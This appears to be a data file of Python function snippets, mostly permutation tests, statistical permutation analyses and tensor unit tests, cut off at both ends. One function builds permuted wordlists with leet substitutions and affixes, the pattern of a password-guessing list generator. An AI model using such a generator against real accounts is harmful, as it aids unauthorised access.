neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,\n repeat = ind_repeat, seq = seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, batch_consum+individual_con, individual_con)", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def test_transpose(self):\n funcs = ['transpose', 'transpose_']\n for func in funcs:\n tensor = get_random_test_tensor()\n encrypted = SharedTensor(tensor)\n reference = getattr(tensor, func)(0, 1)\n encrypted_out = getattr(encrypted, func)(0, 1)\n msg = 'private %s failed' % func\n self._check(encrypted_out, reference, msg)\n if '_' in func:\n # Check in-place op worked\n self._check(encrypted, reference, msg)\n else:\n # Check original is not modified\n self._check(encrypted, tensor, msg)\n\n # Check property\n tensor = get_random_test_tensor()\n encrypted = SharedTensor(tensor)\n self._check(encrypted.T, tensor.T, msg)", "def tes_mod(self):\r\n x, y = ints('xy')\r\n fn = gof.DualLinker().accept(FunctionGraph([x,y], [x%y])).make_function()\r\n for a,b in ((0,1), (1,1), (0,-1), (1,-1), (-1,-1),\r\n (1,2), (-1,2), (1,-2), (-1,-2),\r\n (5,3), (-5,3), (5,-3), (-5,-3)\r\n ):\r\n self.assertTrue(fn(a,b) == a%b, (a,))", "def test_partial_tucker():\n rng = check_random_state(1234)\n tol_norm_2 = 10e-3\n tol_max_abs = 10e-1\n tensor = T.tensor(rng.random_sample((3, 4, 3)))\n modes = [1, 2]\n core, factors = partial_tucker(tensor, modes, ranks=None, n_iter_max=200, verbose=True)\n reconstructed_tensor = multi_mode_dot(core, factors, modes=modes)\n norm_rec = T.norm(reconstructed_tensor, 2)\n norm_tensor = T.norm(tensor, 2)\n T.assert_((norm_rec - norm_tensor)/norm_rec < tol_norm_2)\n\n # Test the max abs difference between the reconstruction and the tensor\n T.assert_(np.max(np.abs(norm_rec - norm_tensor)) < tol_max_abs)\n\n # Test the shape of the core and factors\n ranks = [3, 1]\n core, factors = partial_tucker(tensor, modes=modes, ranks=ranks, n_iter_max=100, verbose=1)\n for i, rank in enumerate(ranks):\n T.assert_equal(factors[i].shape, (tensor.shape[i+1], ranks[i]),\n err_msg=\"factors[{}].shape={}, expected {}\".format(\n i, factors[i].shape, (tensor.shape[i+1], ranks[i])))\n T.assert_equal(core.shape, [tensor.shape[0]]+ranks, err_msg=\"Core.shape={}, \"\n \"expected {}\".format(core.shape, [tensor.shape[0]]+ranks))", "def test_all_pairs_t_test(self):\r\n # We aren't testing the numeric values here, as they've already been\r\n # tested in the functions that compute them. We are interested in the\r\n # format of the returned string.\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# The nonparametric p-values were calculated using 999 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\t0.095\t0.285\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\t0.101\t0.303\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\t0.217\t0.651\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def _perm_stat(self, index): # pragma: no cover\n\n permu = np.random.permutation(self.u)\n permv = np.random.permutation(self.v)\n\n # calculate permuted statics, store in null distribution\n perm_stat = self.indep_test._statistic(permu, permv)\n\n return perm_stat", "def testEjemploTp(self):\n azul = [0, 4, 5, 0]\n rojo = [1, 7, 4, 0]\n amarillo = [3, 6, 8, 0]\n negro = [6, 10, 10, 0]\n magenta = [7, 8, 12, 0]\n verde = [9, 11, 11, 0]\n perfiles = []\n perfiles.append(azul)\n perfiles.append(rojo)\n perfiles.append(amarillo)\n perfiles.append(negro)\n perfiles.append(magenta)\n perfiles.append(verde)\n perfil = Perfil.Perfil()\n resultadoEsperado = [0, 4, 1, 7, 4, 6, 6, 10, 9, 11, 11, 8, 12]\n for x in range(10000):\n inicial = random_integers(6, 0)\n inicial = inicial*4\n perfilOriginal = []\n for i in range (inicial, len(perfiles)+inicial, 1):\n perfilOriginal += perfiles[i%len(perfiles)]\n \n resultado = perfil.calcularPerfil(perfilOriginal, 0)\n self.assertEqual(resultadoEsperado, resultado)", "def test_p_tilda(self, test_inputs, random_inputs, training):\n \n self.batch_size = test_inputs.shape[0]\n \n self.num_samples = random_inputs.shape[0]\n \n self.add_p_tilda(training = training)\n \n var_list = [self.x, self.x_tilda]\n \n get_p_tilda = theano.function(inputs = var_list,\n outputs= self.p_tilda)\n \n probs = get_p_tilda(test_inputs, random_inputs)\n \n si = self.batch_size+self.np_rand_gen.choice(self.num_samples, 10, False)\n \n return probs[0:self.batch_size], probs[si]", "def test_all_pairs_t_test_invalid_tests(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (high) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean > Group 2 mean\r\n# The nonparametric p-values were calculated using 20 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\tN/A\tN/A\tN/A\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(['foo', 'bar'], [[], [1, 2, 4]],\r\n 'high', 20)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_euclidean_parallel_transport(self):\n \n self._test_parallel_transport(k=0)", "def test_distance_matrix_permutation_test_return_scores(self):\r\n # use alt statistical test to make results simple\r\n def fake_stat_test(a, b, tails=None):\r\n return 42., 42.\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n self.assertEqual(distance_matrix_permutation_test(\r\n m, [(0, 0), (0, 1), (0, 2)],\r\n n=5, f=fake_stat_test, return_scores=True), (42., 42., 0., [42.] * 5))", "def par_test_14(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def test_mutation(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n mutated_g = mutator(mutated_g)\n mutated_g = mutator(mutated_g)\n a, s, d = get_conf(mutated_g)\n print('---->', mutated_g)\n self.assertGreaterEqual(10, d)\n self.assertTrue(s in (0, 1))\n a = torch.tensor(a)\n d = int((a.shape[0]*2)**.5)\n start = 0\n for i in range(d):\n end = int((i+1)*(i+2)/2)\n self.assertTrue(a[start:end, :].sum() > 0)\n start = end", "def permute_via_gather(val, permutation, inverse_permutation, axis=0):\n # It is *not* safe to use jax.custom_vjp here. The most likely cause is that\n # it can't close over values: https://github.com/google/jax/issues/2676\n # The error only occurs in some configurations (e.g. use_python_loop = True,\n # num_parallel_heads = 1) but not others.\n permutation = jax.lax.stop_gradient(permutation)\n inverse_permutation = jax.lax.stop_gradient(inverse_permutation)\n def permute_impl(val):\n return jnp.take(val, permutation, axis=axis)\n def permute_vjp(val):\n permuted = permute_impl(jax.lax.stop_gradient(val))\n def vjpfun(permuted_grad):\n # JAX autodiff would synthesize a scatter operation because it doesn't\n # know that the indices are a permutatation. However on TPU, gathers are\n # faster than scatters (at least in the regime the LSH attention uses).\n return (jnp.take(permuted_grad, inverse_permutation, axis=axis),)\n return permuted, vjpfun\n permute = jax.custom_transforms(permute_impl)\n jax.defvjp_all(permute, permute_vjp)\n return permute(val)", "def cell_permutation(self):\n\n self.log.info(\"Begin Sample Permutation Analysis.\")\n\n # Initialize some variables.\n self.seg_analyzer.break_points(permutation=True)\n permutation_list = self.seg_analyzer.sample_names\n # cell_permutation_data_dict = defaultdict(lambda: defaultdict(list))\n odds_string = \"\"\n unique_targeted_odds_ratio_list = []\n total_targeted_odds_ratio_list = []\n total_targeted_del_odds_ratio_list = []\n total_targeted_ins_odds_ratio_list = []\n unique_targeted_ins_odds_ratio_list = []\n unique_targeted_del_odds_ratio_list = []\n\n # Run a loop for the iterations. Shuffle the list and make a copy for each loop.\n\n for i in range(int(self.args.Iteration_Count)):\n numpy.random.shuffle(permutation_list)\n shuffled_permutation_list = permutation_list\n sub_list = []\n count = 0\n\n if i % int(self.args.Prog_Check) == 0:\n self.log.info(\"Iteration {0} of {1} for Sample Permutation Analysis.\"\n .format(i, self.args.Iteration_Count))\n\n # Pybedtools keeps all temporary files until Python exits. This helps keep the disk clean.\n pybedtools.cleanup()\n\n # Create a list with two unique, random lists of indices.\n while count < 2:\n n = (numpy.random.choice(shuffled_permutation_list, int(self.args.Sample_Group_Size), replace=False))\n\n # Remove the first set from the list\n shuffled_permutation_list = list(set(shuffled_permutation_list).difference(n))\n sub_list.append(n)\n count += 1\n\n # Retrieve a namedtuple of the permuted samples\n d0 = self.seg_analyzer.target_intersection(sub_list[0])\n d1 = self.seg_analyzer.target_intersection(sub_list[1])\n\n # cell_permutation_data_dict[0]['del'].append([d0.total_del, d0.total_targeted_del_breakpoints,\n # d0.total_unique_del, d0.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[1]['del'].append([d1.total_del, d1.total_targeted_del_breakpoints,\n # d1.total_unique_del, d1.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[0]['ins'].append([d0.total_ins, d0.total_targeted_ins_breakpoints,\n # d0.total_unique_ins, d0.unique_targeted_ins_breakpoints])\n #\n # cell_permutation_data_dict[1]['ins'].append([d1.total_ins, d1.total_targeted_ins_breakpoints,\n # d1.total_unique_ins, d1.unique_targeted_ins_breakpoints])\n\n total_breakpoint0 = d0.total_del+d0.total_ins\n total_targeted0 = d0.total_targeted_del_breakpoints+d0.total_targeted_ins_breakpoints\n total_unique_breakpoint0 = d0.total_unique_del+d0.total_unique_ins\n total_unique_targeted0 = d0.unique_targeted_del_breakpoints+d0.unique_targeted_ins_breakpoints\n\n total_breakpoint1 = d1.total_del+d1.total_ins\n total_targeted1 = d1.total_targeted_del_breakpoints+d1.total_targeted_ins_breakpoints\n total_unique_breakpoint1 = d1.total_unique_del+d1.total_unique_ins\n total_unique_targeted1 = d1.unique_targeted_del_breakpoints+d1.unique_targeted_ins_breakpoints\n\n total_target_ratio0 = total_targeted0/total_breakpoint0\n total_target_ratio1 = total_targeted1/total_breakpoint1\n\n total_target_odds = total_target_ratio0/total_target_ratio1\n\n unique_target0 = total_unique_targeted0/total_unique_breakpoint0\n unique_target1 = total_unique_targeted1/total_unique_breakpoint1\n\n unique_target_odds = unique_target0/unique_target1\n\n try:\n del_target_odds = \\\n (d0.total_del/d0.total_targeted_del_breakpoints)/(d1.total_del/d1.total_targeted_del_breakpoints)\n except ZeroDivisionError:\n del_target_odds = 0\n try:\n udel_target_odds = \\\n (d0.unique_targeted_del_breakpoints / d0.total_unique_del) / (d1.unique_targeted_del_breakpoints /\n d1.total_unique_del)\n except ZeroDivisionError:\n udel_target_odds = 0\n try:\n ins_target_odds = \\\n (d0.total_targeted_ins_breakpoints/d0.total_ins)/(d1.total_targeted_ins_breakpoints/d1.total_ins)\n except ZeroDivisionError:\n ins_target_odds = 0\n try:\n uins_target_odds = \\\n (d0.unique_targeted_ins_breakpoints / d0.total_unique_ins) / (d1.unique_targeted_ins_breakpoints /\n d1.total_unique_ins)\n except ZeroDivisionError:\n uins_target_odds = 0\n\n total_targeted_odds_ratio_list.append(total_target_odds)\n unique_targeted_odds_ratio_list.append(unique_target_odds)\n total_targeted_del_odds_ratio_list.append(del_target_odds)\n total_targeted_ins_odds_ratio_list.append(ins_target_odds)\n unique_targeted_del_odds_ratio_list.append(udel_target_odds)\n unique_targeted_ins_odds_ratio_list.append(uins_target_odds)\n\n odds_string += \\\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\" \\\n \"\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(total_target_odds, unique_target_odds, del_target_odds, udel_target_odds, ins_target_odds,\n uins_target_odds, total_breakpoint0, d0.total_del, d0.total_ins, total_targeted0,\n d0.total_targeted_del_breakpoints, d0.total_targeted_ins_breakpoints, total_unique_breakpoint0,\n d0.total_unique_del, d0.total_unique_ins, total_unique_targeted0,\n d0.unique_targeted_del_breakpoints, d0.unique_targeted_ins_breakpoints, total_breakpoint1,\n d1.total_del, d1.total_ins, total_targeted1, d1.total_targeted_del_breakpoints,\n d1.total_targeted_ins_breakpoints, total_unique_breakpoint1, d1.total_unique_del,\n d1.total_unique_ins, total_unique_targeted1, d1.unique_targeted_del_breakpoints,\n d1.unique_targeted_ins_breakpoints)\n\n odds_labels = \"Total Targeted\\tUnique Targeted\\tDel Targeted\\tUnique Del Targeted\\tIns Targeted\\t\" \\\n \"Unique Ins Targeted\\tSample_0 Total\\tSample_0 tDel\\tSample_0 tIns\\tSample_0 Targeted\\t\" \\\n \"Sample_0 tDel Targeted\\tSample_0 tIns Targeted\\tSample_0 Unique\\tSample_0 uDel\\tSample_0 uIns\\t\"\\\n \"Sample_0 uTargeted\\tSample_0 uDel Targeted\\tSample_0 uIns Targeted\\tSample_1 Total\\t\" \\\n \"Sample_1 tDel\\tSample_1 tIns\\tSample_1 Targeted\\tSample_1 tDel Targeted\\t\" \\\n \"Sample_1 tIns Targeted\\tSample_1 Unique\\tSample_1 uDel Targeted\\tSample_1 uIns Targeted\\n\"\n\n total_odds_mean = round(scipy.mean(total_targeted_odds_ratio_list), 2)\n del_odds_mean = round(scipy.mean(total_targeted_del_odds_ratio_list), 2)\n ins_odds_mean = round(scipy.mean(total_targeted_ins_odds_ratio_list), 2)\n\n unique_odds_mean = round(scipy.mean(unique_targeted_odds_ratio_list), 2)\n unique_del_odds_mean = round(scipy.mean(unique_targeted_del_odds_ratio_list), 2)\n unique_ins_odds_mean = round(scipy.mean(unique_targeted_ins_odds_ratio_list), 2)\n\n total975 = numpy.percentile(total_targeted_odds_ratio_list, 97.5, interpolation='linear')\n total25 = numpy.percentile(total_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n del975 = numpy.percentile(total_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n del25 = numpy.percentile(total_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n ins975 = numpy.percentile(total_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n ins25 = numpy.percentile(total_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_total975 = numpy.percentile(unique_targeted_odds_ratio_list, 97.5, interpolation='linear')\n unique_total25 = numpy.percentile(unique_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_del975 = numpy.percentile(unique_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n unique_del25 = numpy.percentile(unique_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_ins975 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n unique_ins25 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n outstring = \"Permutation Analysis Module v{}; {} Type Permutations run {}\\n\" \\\n \"Target File:\\t{}\\nSegCopy File:\\t{}\\n\\n\" \\\n \"\\tTotalOddsMean\\tUniqueOddsMean\\tTotal 97.5\\tTotal 2.5\\tUnique 97.5\\tUnique 2.5\\n\" \\\n \"Total\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nDel\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nIns\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\" \\\n \"\\n\\n{}\\n{}\" \\\n .format(__version__, self.args.Permutation_Type, date.today().strftime(\"%Y-%m-%d\"), self.args.Target_File,\n self.args.Segment_File, total_odds_mean, unique_odds_mean, total975, total25, unique_total975,\n unique_total25, del_odds_mean, unique_del_odds_mean, del975, del25, unique_del975, unique_del25,\n ins_odds_mean, unique_ins_odds_mean, ins975, ins25, unique_ins975, unique_ins25, odds_labels,\n odds_string)\n\n outfile = open(\"{0}{1}_odds_ratios.txt\".format(self.args.Working_Folder, self.args.Job_Name), 'w')\n outfile.write(outstring)\n outfile.close()\n self.log.info(\"Sample Permutation Complete\")\n\n return\n #\n # ratio_mean_list = []\n # ratio_std_list = []\n # ratio_list = []\n # odds_ratio_list = []\n # outstring = \"\"\n #\n # # Format data for output file.\n # for sub_group in natsort.natsorted(cell_permutation_data_dict):\n # for key, values in cell_permutation_data_dict[sub_group].items():\n # if key == \"bp\":\n # break_point_mean = int(round(scipy.mean(values)))\n # break_point_std = round(scipy.std(values), 2)\n # break_point_median = int(round(scipy.median(values)))\n # elif key == \"intsect\":\n # intersect_mean = int(round(scipy.mean(values)))\n # intersect_std = round(scipy.std(values), 2)\n # intersect_median = int(round(scipy.median(values)))\n # elif key == \"bp/intsect\":\n # ratio_mean = scipy.mean(values)\n # ratio_std = scipy.std(values)\n # ratio_list.append(values)\n #\n # ratio_mean_list.append(ratio_mean)\n # ratio_std_list.append(ratio_std)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\"\\\n # .format(break_point_mean, break_point_median, break_point_std, intersect_mean, intersect_median,\n # intersect_std)\n # outstring += \"\\t\"\n #\n # for l1, l2 in zip(ratio_list[0], ratio_list[1]):\n # odds_ratio_list.append(l1/l2)\n #\n # t = stats.t.interval(0.95, df=self.freq_calc_iterations-1, loc=scipy.mean(odds_ratio_list),\n # scale=scipy.std(odds_ratio_list) / numpy.sqrt(self.freq_calc_iterations))\n #\n # pval = stats.ttest_1samp(odds_ratio_list, 1)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\n\"\\\n # .format(round(scipy.mean(odds_ratio_list), 2), round(scipy.std(odds_ratio_list), 2), round(t[0], 2),\n # round(t[1], 2), pval[1])\n #\n # for v in odds_ratio_list:\n # outstring += \"{0}\\n\".format(v)\n #\n # outfile.write(outstring)\n # outfile.close()\n #\n # print(\"Permutation Analysis of Samples Complete.\")\n #\n # return", "def test(x_test: int, out_counter_test: int):\n for combo in permutations(input_list, x_test + 1):\n if len(set(map(str.lower, combo))) == len(combo):\n line = ''.join(combo)\n if int(args.min) <= len(line) <= int(args.max):\n print(line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.append is not None:\n print(line + args.append)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.prepend is not None:\n print(args.prepend + line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.leet is True:\n for old, new in leet_replacements:\n line = line.replace(old, new)\n print(line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.append is not None:\n print(line + args.append)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n if args.prepend is not None:\n print(args.prepend + line)\n out_counter_test += 1\n if out_counter_test >= int(args.test):\n return out_counter_test\n return out_counter_test", "def permutations(lst):\n pass # Replace this with your implementation of the function.", "def test_permutation_bad(self):\n self.assertRaises(CircuitError, Permutation, 4, [1, 0, -1, 2])", "def find_adapted_solution(list_of_tuples, module, n_of_players_with_vote):\n\n def malus_roles_left(players_left, roles_left):\n\n \"\"\"\n Checks whether it is possible to deploy all the players by assinging\n a certain number of malus.\n \"\"\"\n\n # Permutations of the players still to be deployed. We do that because\n # we only want that combination of players in which ALL of them are\n # deployed\n players_perm = permutations(players_left, len(players_left))\n\n # Initialize the number of malus (just a number high enough)\n fin_malus = 10\n\n # For each permutation of players to be deployed\n for perm in players_perm:\n\n # Initialize two parameters: a counter and the number of malus for\n # this specific permutation. Counter is used to be sure all the\n # players in the permutation are checked\n count = 0\n temp_malus = 0\n\n # Make a copy of the roles to be covered so we can use it later to\n # delete roles that we are able to cover\n copy_of_adapted_roles = copy.copy(roles_left)\n\n # For each element in the permutation we select the corresponding\n # role and try to cover it\n for i in range(len(perm)):\n role_to_cover = roles_left[i]\n role_cand = perm[i][2]\n\n # If it is possible to cover it with a malus we increase the\n # number of malus and the counter and then remove the role from\n # the list of the roles still uncovered\n if role_to_cover in malus_roles[role_cand]:\n temp_malus += 1\n count += 1\n copy_of_adapted_roles.remove(role_to_cover)\n\n # If it is possible to cover it with no malus we just increase\n # the counter and delete the role\n elif (role_to_cover not in malus_roles[role_cand]\n and role_to_cover in compatible_roles[role_cand]):\n count += 1\n copy_of_adapted_roles.remove(role_to_cover)\n\n # Else we interrupt checking this permutation and go to the\n # one\n else:\n break\n\n # If we checked ALL the elements in the permutation and the number\n # of malus is lower than the previous value we store it\n if count == len(perm) and temp_malus < fin_malus:\n fin_malus = temp_malus\n\n # If this value is different from the default one it means we found a\n # solution and we return it\n if fin_malus != 10:\n return fin_malus\n else:\n return False\n\n def calculate(candidate, roles_of_module):\n\n \"\"\"\n This function applies the deploy_players function to look for the\n solution, if it exists. If all the players are deployed it returns\n True, otherwise False.\n \"\"\"\n\n # See find_solution for explanation on the try method\n try:\n to_deploy_list, roles_left = deploy_players(candidate,\n roles_of_module,\n 'adapted')\n\n # If the roles to deploy can be covered with a malus we return the\n # number of malus assigned\n\n if malus_roles_left(to_deploy_list, roles_left):\n return malus_roles_left(to_deploy_list, roles_left)\n else:\n return False\n\n except TypeError:\n return False\n\n ordered_lineup = order_by_role(list_of_tuples)\n\n all_comb = list(combinations(schemes[module], n_of_players_with_vote))\n\n for comb in all_comb:\n\n # Change from tuple to list and check wings\n comb = transf_wings(list(comb), module)\n\n # If a solution is found we return the number of malus\n if calculate(ordered_lineup, comb):\n return calculate(ordered_lineup, comb)\n\n return False", "def c_test_run_inp(self, temp_params, base_locals):\r\n return 1", "def c_test_run_inp(self, temp_params, base_locals):\r\n return 1", "def permutation(nums):\n list = []\n temp = []\n backtrack(list, temp, nums)\n return list", "def permTS(dataDict=None, dataLabel='data', mode='exact.ce'):\n\n # test calling values\n if mode not in ['exact.ce', 'exact.mc']:\n raise ValueError('RStats.permTS: Mode must be either'\n + ' \"exact.ce\" or \"exact.mc\"; got %s' % mode)\n if dataDict is None or not (isinstance(dataDict, dict) \n or len(dataDict.keys()) != 2):\n raise ValueError('RSTATS.permTX: dataDict must be'\n + ' a dictionary with exactly 2 keys')\n k = list(dataDict.keys())\n g1 = dataDict[k[0]]\n g2 = dataDict[k[1]]\n\n u = perm.permTS(\n FloatVector(g1), FloatVector(g2), alternative='two.sided',\n method=mode)\n pvalue = float(u[3][0])\n if mode == 'exact.mc':\n nmc = int(u[10][0])\n else:\n nmc = 0\n d = u[1].items() # stored as a generator (interesting...) # using next for py2/3\n estdiff = next(d) #.next() # gets the tuple with what was measured, and the value \n if dataLabel is not None:\n print('\\nPermutation Test (R permTS). Dataset = %s' % (dataLabel))\n print(u' Test statistic: ({:s}): {:8.4f}'.\n format(estdiff[0], estdiff[1]))\n print(u' p={:8.6f}, Nperm={:8d} [mode={:s}]'.\n format(float(pvalue), int(nmc), mode))\n return (pvalue, nmc) # return the p value and the number of mc replicatess", "def _count_block_perm(orig_vals, perm_ds, nbs, tail, rng, return_null, clip_min_value):\n orig_vals = np.atleast_2d(orig_vals)\n # uniform perm_ds for both single and paired test\n if perm_ds.ndim == 3:\n perm_ds = perm_ds[None]\n n_groups, n_observations, n_features, n_permutations = perm_ds.shape\n if n_groups > 2:\n raise ValueError(\"orig_vals should have maximum two rows for paired\")\n if n_groups == 2:\n print(\"Running a paired test\")\n else:\n print(\"Running an independent test\")\n count_vals = np.zeros(n_features)\n if clip_min_value is not None:\n print(\"Clipping minimum to {}\".format(clip_min_value))\n orig_vals = np.clip(orig_vals, clip_min_value, orig_vals.max())\n if n_groups == 2:\n orig_vals = orig_vals[0] - orig_vals[1]\n else:\n orig_vals = orig_vals[0]\n if return_null:\n null_distribution = np.zeros((nbs, n_features), dtype=orig_vals.dtype)\n for ibs in range(nbs):\n randidx = rng.choice(np.arange(n_permutations), size=n_observations)\n perm_vals = np.dstack(\n [perm_ds[:, i, :, idx] for i, idx in enumerate(randidx)]).mean(axis=-1)\n # clip\n if clip_min_value is not None:\n perm_vals = np.clip(perm_vals, clip_min_value, perm_vals.max())\n # take diff if we have two groups\n if n_groups == 2:\n perm_vals = perm_vals[0] - perm_vals[1]\n else:\n perm_vals = perm_vals[0]\n assert perm_vals.shape == orig_vals.shape\n # store perm_vals if we return the null\n if return_null:\n null_distribution[ibs] = perm_vals\n # count depending on the tail\n if tail == 1:\n count_vals += (perm_vals >= orig_vals).astype(int)\n elif tail == -1:\n count_vals += (perm_vals <= orig_vals).astype(int)\n else:\n count_vals += (np.abs(perm_vals) >= np.abs(orig_vals)).astype(int)\n return (count_vals, null_distribution) if return_null else count_vals", "def check_correctness_bc01(f):\n\n rng = np.random.RandomState([2012, 7, 19])\n batch_size = 5\n rows = 32\n cols = 30\n channels = 3\n pool_rows = 2\n pool_cols = 3\n zv = rng.randn(batch_size, rows, cols,\n channels).astype(config.floatX) * 1. - 1.5\n top_down_v = rng.randn(batch_size, rows / pool_rows, cols / pool_cols,\n channels).astype(config.floatX)\n\n p_np, h_np = max_pool_python(zv, (pool_rows, pool_cols), top_down_v)\n\n z_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n z_th.name = 'z_th'\n zr = z_th.dimshuffle(0, 3, 1, 2)\n\n top_down_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n top_down_th.name = 'top_down_th'\n top_down_r = top_down_th.dimshuffle(0, 3, 1, 2)\n\n p_th, h_th = f(zr, (pool_rows, pool_cols), top_down_r)\n\n func = function([z_th, top_down_th], [p_th.dimshuffle(0, 2, 3, 1),\n h_th.dimshuffle(0, 2, 3, 1)])\n\n pv, hv = func(zv, top_down_v)\n\n assert p_np.shape == pv.shape\n assert h_np.shape == hv.shape\n if not np.allclose(h_np, hv):\n print((h_np.min(), h_np.max()))\n print((hv.min(), hv.max()))\n assert False\n if not np.allclose(p_np, pv):\n diff = abs(p_np - pv)\n print('max diff ', diff.max())\n print('min diff ', diff.min())\n print('ave diff ', diff.mean())\n assert False", "def tuple_permutation(v,P):\r\n u = []\r\n w = list(v)[:]\r\n test = True\r\n for i in range(len(v)):\r\n if ((isinstance(v[i], int) == True) or (isinstance(v[i], str) == True)):\r\n if (v[i] in P):\r\n w[i] = P(v[i])\r\n else:\r\n u.append(tuple_permutation(tuple(v[i]),P))\r\n test = False\r\n if (test == True):\r\n return tuple(w)\r\n else:\r\n return tuple(u)", "def test_assign_resources_to_tmc_subarray_in_low():", "def test_distance_matrix_permutation_test_non_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return [distance_matrix_permutation_test(*args, **kwargs)[2]\r\n for i in range(10)]\r\n\r\n m = arange(9).reshape((3, 3))\r\n n = 100\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n\r\n # looks at each possible permutation n times --\r\n # compare last row to rest\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)", "def test_partition_T(self):\n Z = Partition(size=1000)\n for p in chain(Z, [{'k':-1, 'r': 0}, {'k': 1, 'r': -1},\n {'k': -1, 'r': -1}]):\n rows = Z.T(**p)\n self.assertEqual(rows, legacy_T(Z, **p))\n\n out = Z.V(**p)\n self.assertEqual(out, legacy_V(Z, **p))\n\n out = 